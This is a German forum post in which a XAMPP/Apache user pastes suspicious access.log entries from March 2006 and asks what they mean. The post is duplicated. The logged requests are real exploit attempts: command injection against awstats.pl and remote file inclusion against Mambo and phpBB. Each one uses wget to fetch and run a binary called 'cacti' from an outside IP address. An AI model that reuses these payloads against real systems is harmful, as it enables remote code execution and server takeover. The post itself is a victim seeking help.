Hallo erstmal, ich hab hier in dieses Forum reingepostet weil laut der Suche schon mehrere Threads über Apache hier drin sind. Ich hoffe das Forum ist nicht flasch gewählt. Also ich hab heute früh seltsame Logeinträge in meinen Apache "access.log" gehabt. Ich habe Apache mit XAMPP (basic package) version 1.5.1 für Windows XP/2000 installiert. Meine Apache Version ist Apache 2.2.0 und MySQL 5.0.18. Die XAMMP Control Panel Version ist 2.1 und ich benutze PHP 5.1.1. Ich denke das müsste erstmal reichen an Informationen. So und nun die Logeinträge die mir Sorgen machen.
84.162.0.86 - - [17/Mar/2006:00:59:32 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:33 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:34 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:35 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:36 +0100] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:37 +0100] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:38 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:40 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:41 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:42 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.163.197.52 - - [17/Mar/2006:01:45:27 +0100] "GET / HTTP/1.0" 200 1023
Ich muss dazu sagen ich habe auf dem Server kein phpBB2 oder ähnliches laufen. Der Angreifer (falls es einer ist) hätte meine IP-Adresse über IRC herausfinden können da ich zu der Zeit im IRC war. Ich war aber jedoch während der Zeit nicht wach also ist mir auch nichts aufgefallen. (jaja ich weis ich bin ein idler
)
Nun meine Frage was bedeuten die Zeilen nun ?
Vielen Dank schoneinmal im Vorraus.
84.162.0.86 - - [17/Mar/2006:00:59:32 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:33 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:34 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:35 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:36 +0100] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:37 +0100] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:38 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:40 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:41 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.162.0.86 - - [17/Mar/2006:00:59:42 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| HTTP/1.1" 404 1122
84.163.197.52 - - [17/Mar/2006:01:45:27 +0100] "GET / HTTP/1.0" 200 1023
Ich muss dazu sagen ich habe auf dem Server kein phpBB2 oder ähnliches laufen. Der Angreifer (falls es einer ist) hätte meine IP-Adresse über IRC herausfinden können da ich zu der Zeit im IRC war. Ich war aber jedoch während der Zeit nicht wach also ist mir auch nichts aufgefallen. (jaja ich weis ich bin ein idler
Nun meine Frage was bedeuten die Zeilen nun ?
Vielen Dank schoneinmal im Vorraus.